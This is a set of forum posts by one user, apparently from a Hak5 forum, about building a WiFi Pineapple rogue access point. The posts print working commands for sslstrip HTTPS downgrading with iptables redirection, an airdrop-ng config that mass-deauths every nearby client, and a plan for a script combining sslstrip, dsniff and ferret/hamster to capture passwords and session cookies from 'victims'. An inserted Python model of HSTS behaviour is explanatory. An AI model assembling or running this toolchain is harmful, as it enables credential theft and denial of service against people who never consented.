Everything posted by diggler

  1. 1. My 2nd wireless adapter is used to deploy airdrop-ng for mass deauth.
     2. I really dislike the GUI managers because when two wireless NICs are connected it auto connects both adapters to OPEN wifi networks. Even when /etc/init.d/interfaces remains commented.
     3. I meant provide an internet source to the pineapple by first connecting the laptop itself to the internet
  2. When manually connecting to an OPEN WiFi network using BT5R1 "dhclient wlan0" (as seen in Telot's script) (without using "NetworkManager Applet 0.8" or "Wicd Network Manager") for wlan0 I get an error.

     1) Any ideas? I've searched all over and found different variations of what I'll post below but they all give me the same error:

     OPEN WiFi AP

         Cell 02 - Address: 00:10:D0:00:75:00
                   Channel:11
                   Frequency:2.462 GHz (Channel 11)
                   Quality=44/70  Signal level=-66 dBm
                   Encryption key:off
                   ESSID:"TEST"
                   Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                             9 Mb/s; 12 Mb/s; 18 Mb/s
                   Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
                   Mode:Master
                   Extra:tsf=000002a969051235
                   Extra: Last beacon: 90ms ago
                   IE: Unknown: 000D574E315F4248355F534F555448
                   IE: Unknown: 010882848B960C121824
                   IE: Unknown: 03010B
                   IE: Unknown: 0706555320010B1B
                   IE: Unknown: 200100
                   IE: Unknown: 2A0100
                   IE: Unknown: 32043048606C
                   IE: Unknown: DD0900037F01010000FF7F

     Configuring Wifi through wlan0 interface for netbook internet access

         root@bt:~/Desktop# ./wlan0.sh
         ifconfig wlan0 down
         ifconfig wlan0 up
         iwconfig wlan0 essid "TEST"
         iwconfig wlan0 channel 11
         iwconfig wlan0 mode managed
         dhclient wlan0

     ERROR

         Internet Systems Consortium DHCP Client V3.1.3
         Copyright 2004-2009 Internet Systems Consortium.
         All rights reserved.
         For info, please visit https://www.isc.org/software/dhcp/

         mon0: unknown hardware address type 803
         mon0: unknown hardware address type 803
         Listening on LPF/wlan0/00:35:d3:88:c9:18
         Sending on   LPF/wlan0/00:35:d3:88:c9:18
         Sending on   Socket/fallback
         DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 4
         DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 7
         DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 13
         DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 10
         DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 10
         DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 14
         DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 3
         No DHCPOFFERS received.
         No working leases in persistent database - sleeping.

     My guess is that it has something to do with "DHCPDISCOVER" looking for "255.255.255.255" and not "255.255.254.0", or the error "mon0: unknown hardware address type 803".

     What it looks like if I connect successfully with NetworkManager Applet 0.8 with only one wifi adapter connected:

         wlan0     Link encap:Ethernet  HWaddr 00:11:d1:18:b1:11
                   inet addr:192.168.20.93  Bcast:192.168.21.255  Mask:255.255.254.0
                   inet6 addr: fe80::225:d3ff:fe88:c818/64 Scope:Link
                   UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
                   RX packets:108579 errors:0 dropped:0 overruns:0 frame:0
                   TX packets:22183 errors:0 dropped:0 overruns:0 carrier:0
                   collisions:0 txqueuelen:1000
                   RX bytes:54172944 (54.1 MB)  TX bytes:2352640 (2.3 MB)

     2) Is there a way to flush and restore "NetworkManager Applet 0.8" and "Wicd Network Manager" to default settings? I'm getting all sorts of "can't obtain IP address" errors.

         service network-manager stop
         /etc/init.d/wicd stop

     My hardware setup is:

     Laptop - Teo Pro Netbook (http://zareason.com/...ro-Netbook.html)
     Laptop built in wireless adapter - wlan0 ath9k[mac80211]-N/A Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
     OS - BT5 R1 Linux bt 2.6.39.4 x86_64 GNU/LINUX
     Pineapple - AP51 MK3 v2.0.1
     2nd external wireless adapter - wlan1 Alfa (from hakshop) rtl8187[mac80211]-N/A Realtek Semiconductor Corp. RTL8187

     3) Could there be a conflict between the two WiFi NICs because they're both trying to use the "mac80211" stack at the same time?
  3. I received this comment from the man himself...

     "Both use HSTS headers now, so if you're using a browser that supports them (like Chrome), there's no opportunity for sslstrip to do anything. That output is from Twisted, and it doesn't indicate any actual problem."

     UPDATE1: http://www.owasp.or...nsport_Security

     UPDATE2: SSLStrip still works against Safari. Definitely broken with FF and Chrome tho : ( Now what?

     UPDATE3: "HSTS fixes this problem by informing the browser that connections to the site should always use SSL. Of course, the HSTS header can be stripped by the attacker if this is the user's first visit. Chrome attempts to limit this problem by including a hard-coded list of HSTS sites.[11] Unfortunately this solution cannot scale to include all websites on the internet; a more workable solution can be achieved by including HSTS data inside DNS records, and accessing them securely via DNSSEC."
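The first-visit window that UPDATE3 describes, as an added example (not code from the post, from sslstrip or from any browser): a small Python model of a browser's HSTS store and preload list, with constructed hostnames, timestamps and a constructed preload list, showing on which navigations a plain http:// request is upgraded locally and therefore never reaches a stripping proxy in cleartext.

```python
from typing import Dict, FrozenSet, NamedTuple, Optional, Tuple

class HstsPolicy(NamedTuple):
    max_age: int             # seconds the browser must remember the host
    include_subdomains: bool

def parse_hsts(header: Optional[str]) -> Optional[HstsPolicy]:
    """Parse a Strict-Transport-Security value (RFC 6797 s6.1); None = no policy."""
    if header is None:
        return None
    max_age, include_sub = None, False
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name, value = name.strip().lower(), value.strip().strip('"')
        if name == "max-age":
            if max_age is not None or not value.isdigit():
                return None  # duplicate or non-numeric max-age: header rejected
            max_age = int(value)
        elif name == "includesubdomains":
            include_sub = True  # other directives (e.g. preload) are ignored here
    return None if max_age is None else HstsPolicy(max_age, include_sub)

class BrowserHstsState:
    """Model of a browser's HSTS store plus a preload list (constructed; assumed to cover subdomains)."""
    def __init__(self, preloaded: FrozenSet[str] = frozenset()):
        self.preloaded = preloaded
        self.known: Dict[str, Tuple[HstsPolicy, float]] = {}  # host -> (policy, expiry)

    def note_response(self, host: str, over_tls: bool, header: Optional[str], now: float) -> None:
        # RFC 6797 s8.1: only a header received over TLS is honoured, so a policy
        # cannot be planted or refreshed during a stripped plain-HTTP session.
        policy = parse_hsts(header) if over_tls else None
        if policy is None:
            return
        if policy.max_age == 0:
            self.known.pop(host, None)  # max-age=0 deletes the entry
        else:
            self.known[host] = (policy, now + policy.max_age)

    def upgrades(self, host: str, now: float) -> bool:
        """True if http://host is rewritten to https:// before any packet leaves the machine."""
        labels = host.split(".")
        for i in range(len(labels) - 1):  # host itself, then each parent domain
            candidate = ".".join(labels[i:])
            if candidate in self.preloaded:
                return True
            entry = self.known.get(candidate)  # expired entries simply stop matching
            if entry and now < entry[1] and (i == 0 or entry[0].include_subdomains):
                return True
        return False

def first_visit_scenario() -> Dict[str, bool]:
    """Replays UPDATE3's situation with constructed hosts and timestamps."""
    b = BrowserHstsState(preloaded=frozenset({"preloaded.example"}))
    t0 = 1_000_000.0
    out = {"first_visit_unknown_site": b.upgrades("unknown.example", t0),
           "first_visit_preloaded_site": b.upgrades("preloaded.example", t0)}
    b.note_response("unknown.example", False, "max-age=31536000", t0)  # arrived over plain HTTP
    out["after_header_over_http"] = b.upgrades("unknown.example", t0 + 1)
    b.note_response("unknown.example", True, "max-age=3600; includeSubDomains", t0 + 2)
    out["after_header_over_tls"] = b.upgrades("unknown.example", t0 + 3)
    out["subdomain_covered"] = b.upgrades("login.unknown.example", t0 + 3)
    out["after_max_age_expired"] = b.upgrades("unknown.example", t0 + 2 + 3600)
    return out
```

The only navigations left unprotected are the first visit to a non-preloaded host and any visit after the cached max-age has run out, which is exactly the gap the preload list and the DNS-based proposal in UPDATE3 try to close.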
  4. I found that it makes a difference if:
     - trying to change the SSID when karma or autostart is enabled caused problems
     - I first disable all functionality relating to karma, then change SSID and bring it back online.
     I realize this may sound extremely obvious but I've observed others toggling back and forth on the WEBGUI just hitting change karma SSID and then going back to the status page without first taking Karma offline. Maybe it's supposed to work no matter what but I've experienced issues performing changes without karma being disabled.
  5. Hey Guys, Can anyone confirm the same results? When testing in my lab SSLStrip works/doesn't work with the following sites:

     NOTE: client browser Google Chrome 17.0.963.33 beta on Mac OS X

     YES
     - linkedin.com
     - facebook.com

     NO
     - mail.google.com
     - twitter.com

     If others get the same result, could it be that the big co's have found a way to prevent the attack?

     I get the following error output from SSLStrip after visiting GMAIL.

     MK3 AP51 v2.0.1 /w BT5R1

         cd /pentest/web/sslstrip
         chmod +x sslstrip.py
         iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
         ./sslstrip.py -l 10000 -k -f
         tail -f sslstrip.log

         root@bt:~/pentest# cd /pentest/web/sslstrip/
         root@bt:/pentest/web/sslstrip# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
         root@bt:/pentest/web/sslstrip# ./sslstrip.py -l 10000 -k -f

         sslstrip 0.9 by Moxie Marlinspike running...

         Traceback (most recent call last):
           File "./sslstrip.py", line 105, in main
             reactor.run()
           File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 1170, in run
             self.mainLoop()
           File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 1182, in mainLoop
             self.doIteration(t)
           File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 140, in doSelect
             _logrun(selectable, _drdw, selectable, method, dict)
         --- <exception caught here> ---
           File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger
             return callWithContext({"system": lp}, func, *args, **kw)
           File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext
             return context.call({ILogContext: newCtx}, func, *args, **kw)
           File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext
             return self.currentContext().callWithContext(ctx, func, *args, **kw)
           File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext
             return func(*args,**kw)
           File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 156, in _doReadOrWrite
             self._disconnectSelectable(selectable, why, method=="doRead")
           File "/usr/lib/python2.6/dist-packages/twisted/internet/posixbase.py", line 191, in _disconnectSelectable
             selectable.readConnectionLost(f)
           File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 508, in readConnectionLost
             self.connectionLost(reason)
           File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 677, in connectionLost
             Connection.connectionLost(self, reason)
           File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 519, in connectionLost
             protocol.connectionLost(reason)
           File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 489, in connectionLost
             self.handleResponseEnd()
           File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
             HTTPClient.handleResponseEnd(self)
           File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd
             self.handleResponse(B)
           File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 134, in handleResponse
             self.shutdown()
           File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 154, in shutdown
             self.client.finish()
           File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish
             "Request.finish called on a request after its connection was lost; "
         exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.
  6. Frackin' sweet... It's going to be like Christmas all over again :) Thanks Seb
  7. Wicked post. Thanks for going through the trouble to get those results :) Much appreciated!
  8. The AP51 doesn't require a 12V power source to operate. It's been proven that it can run on a number of different power sources, even as low as a USB port. As to the math of how and why? No clue.
  9. I had the same problem. The barrel adapter that came with my AP51 MK3 didn't fit correctly. I went to my local computer store and bought a new barrel adapter. The size is 5.5mm od 2.1mm id. You'll need to remove the old and solder the new. Alternatively you can buy a USB to Barrel adapter to power the MK3 off of your laptop's USB port :)
  10. http://forums.hak5.org/index.php?showtopic=24325
  11. What if we could have SSLSTRIP or some other tool to block cookies from being sent? That would force users to log back in, because the "-k" flag doesn't seem to kill the connection to the users website as advertised.
  12. I'm using BT5R1 fully updated and upgraded using apt-get -- it's running sslstrip v0.9. I did not manually download and install.

      It seems to me that most users rely heavily on autocomplete + cookies + browser history. Looks like my choice right now is either all these sslstrip quirks, or a certificate prompt from ettercap : /

      [Other weird behavior I've noticed today with SSLStrip is that when my friend tries to access regular HTTP sites it displays "webpage cannot be displayed" sometimes too, in addition to that error when first browsing to HTTPS enabled sites. Generally it just alerts the user that something is broken and isn't working correctly. It seems to work after a number of refreshes.]

      Going to try and add "ferret and hamster" to my script. However, if SSLStrip isn't running it will only capture unencrypted sessions : / So I guess SSLStrip still has to be run, which basically defeats the purpose. Hmm...

      Are there any HTTP session hijacking (sidejacking) tools that can defeat SSL without sslstrip? Maybe some other sslstrip variant, or a different sidejacking process altogether? Firesheep is another option to hamster/ferret for HTTP traffic, but I don't like how it is picky about what version of FF you have to use.

      In the tutorials I've been reading wireshark or ettercap are used for network traffic capture (pcap) in conjunction with hamster/ferret, but because we're using a pineapple will hamster/ferret work in real time without running a network capture tool? Can anyone explain how these apps work? It says that ferret is used to collect data seepage and I'm guessing hamster is the webserver configured to serve up what ferret finds?? There is no documentation on their site and it appears to be down or not well supported. There doesn't seem to be any "man" documentation or a README in the BTR1 directory /pentest/sniffers/hamster

      http://erratasec.blo...-ferret-20.html
      http://hamster.erratasec.com/
  13. Does it make sense that this would happen because she was using Safari and it's not well supported in SSLStrip?
  14. Can anyone comment on the behavior of SSLStrip? After trials with three laptops (two personal and a friend's) this evening I found that:
      - when sslstrip is running when a victim's laptop is browsing the web it first displays a page that says cannot find webpage and then if you refresh the page again it will load the site. I was trying it on a friend and they just gave up trying to browse because it said the website couldn't be displayed, which was frustrating to watch knowing that's how other users might respond.
      - the same friend, instead of typing in facebook.com for example, would use a URL that was saved in history and sslstrip wouldn't redirect to the unencrypted version.
      - the same friend was already logged into facebook and was relying on cookies as we bounced her to different APs for internet. The "-k" flag for sslstrip was not forcing her to relogin as the feature suggests. [Mr. Protocol, that's why I suggested using ferret&hamster]
      - when logged into facebook.com successfully using sslstrip a huge block of code was at the top like a banner ad.
      Does anyone else experience these types of behavior? Is there a way to make it more fluid of an experience without those types of errors?
  15. Telot, awesome post... Unless we are interested in being laser focused (/me queues the sharks with freakin' laser beams attached to their heads) with aireplay, why not add airdrop-ng to the WEB-GUI so we can just use our death star's tractor beam and bring in everything that's around...

      Snippet of code from Darren:

          touch deauth.conf
          nano deauth.conf
          a/00:00:00:00:00:00|any <-- mac of our AP51 AP
          d/any|any
          airdrop-ng -i mon0 -t cap-01.csv -r deauth.conf

      My question still remains, from another thread: how can the pineapple keep providing internet to existing clients that you are p0wning, if you start deauthing from the web-gui and the pineapple's wireless adapter? Isn't a better solution, so that timing and preventing existing clients from being disconnected, to use an ALFA USB and a tool running on our laptop? Unless the answer to my question is that you can have clients connect plus do mass deauth all from the pineapple without interruptions, then I think it's best to have a 2nd wireless adapter for deauthing.
  16. Is it possible to get airdrop-ng on the pineapple as well then? Otherwise, I would need the original HW setup in the first post of this thread (A), and airdrop-ng off the ALFA USB.
  17. I didn't know that, but it makes a big difference in how I'm thinking of setting up my system. Can you explain why that's possible on the wireless interface of the pineapple and not the ALFA USB interface? Also, what tool is issuing the deauth? Is it possible to use the airdrop-ng command that I've referenced in the first post of this thread? Many thanks Seb... Cheers...
  18. I apologize in advance, this will be a short reply because I'm on my phone. If you invest in a different hardware setup, where you have two wireless adapters (ex wlan0 and wlan1) and 1 ethernet adapter, you can use one to connect to the internet, one to run pineapple and karma and the spare wlan1 to issue deauths.
  19. Most people don't login to FB, GMAIL, ETC... their cookies do it for them. The chance that you catch someone logging in is lower than scraping cookies while they're browsing, especially in a deauth scenario
  20. 1. Why is there a deauth tool on the pineapple WEBGUI then? Because people are connecting through it sharing internet access but we have the ability to deauth at the same time through it...
      3. Agreed : / got a little carried away there... I would really like SSLSTRIP/DSNIFF/FERRET+HAMSTER to run off the bat (with airdrop-ng deauth option quickly accessible). Someone's already expressed some interest to help, so I'll post what is created in time.
  21. 1. Is it true that we can use the airdrop-ng tool to deauth at the same time, on the same wireless adapter, that we are sharing internet from (ex. wlan0/mon0)?

      2. Depending on the answer either A or B will be the better hardware setup.

      A
      - laptop with BTR1 physically installed on entire disk
      - connect to internet with wlan0 (built in laptop wireless adapter)
      - deauth with wlan1 (USB wireless adapter -- ALFA)
      - connect to AP51 MK3 with eth0 (built in laptop wired adapter)

      or B
      - laptop with BTR1 physically installed on entire disk
      - connect to internet with wlan0 (built in laptop wireless adapter)
      - deauth with wlan0 (at the same time with same wireless adapter)
      - connect to AP51 MK3 with eth0 (built in laptop wired adapter)

      3. I'd like to combine a number of scripts to function with this type of hardware / software setup. What I'm thinking is:
      - first get internet going on the laptop (wicd or command based)
      - run master script (wp3 on steroids)
      - have all tools, besides karma, run off of BT5R1 (why? because of hardware storage/power/dependency restrictions/limitations)
      - mk3 pineapple WEBGUI still very handy for watching connection / association / dhcp logs etc
      - get the wp3.sh script to autostart karma
      - in new steroid script setup:
        xterm used for window control
        ferret and hamster for sidejacking
        sslstrip for https
        dsniff for all other username/passwords (or ettercap)
        urlsnarf to monitor visited urls
        driftnet for fun
        firefox needs to be configured with a proxy of 127.0.0.1:1234
        url for hamster server is http://hamster
      - tell these tools in a new script to log in a new folder on the desktop (or wherever) to make it easier to find all the new data instead of having to browse diff DIRs per tool

      4. I like the functionality these scripts offer, but they'll need some modification
      - http://www.backtrack-linux.org/forums/backtrack-5-experts-section/45123-another-script-sidejacking-%5Bsidejackssl-sh%5D.html
      - http://teh-geek.com/?p=565
      - itsm0ld's script
      - obviously add as much of this to wp3.sh in the right order of operations

      5. Goal being, connect all HW, turn on laptop, get an internet connection, run one script (or two), follow prompts and start watching the goodness.

      6. What seems messy in all these scripts is the different IPTABLES rules for each one. I think the only rule that would need to be added to wp3.sh is the SSLSTRIP one:

          iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 127.0.0.1:8080

      7. have a terminal pop-up so you can launch airdrop-ng deauth when ready
      - autolaunch terminal with Darren's airdrop-ng script for mass deauth except us (but make sure we still have to hit enter, in case we don't want or need to do this off the bat)

          touch deauth.conf
          nano deauth.conf
          a/00:00:00:00:00:00|any <-- mac of our AP51 AP
          d/any|any
          airdrop-ng -i mon0 -t cap-01.csv -r deauth.conf

      8. assume that if the script was written now that BT5R1 had just had an apt-get update; apt-get upgrade -y done on it. Updates sslstrip to .9 latest and all the tools to what we need I believe
  22. Thanks all! Two are now on the way :) ho ho ho For anyone else who is looking to buy in different countries, or from different suppliers, the size you need is: 5.5mm od 2.1mm id
  23. Sorry for the double post. httpCRASH has asked (as have I and others) a lot of good (but noob) questions in some of the front page threads. I think if we compiled it into a section that could be put on the wiki it would save a lot of seb's, ghost's, mr packet's and djninja's time to just reference the wiki. It's a pain linking to forum threads because they morph too often. What oftentimes doesn't get written on the wiki is the logic for WHY. There's one post in particular where httpCRASH talks through his logic really well that makes a huge difference in understanding what the interface actually does.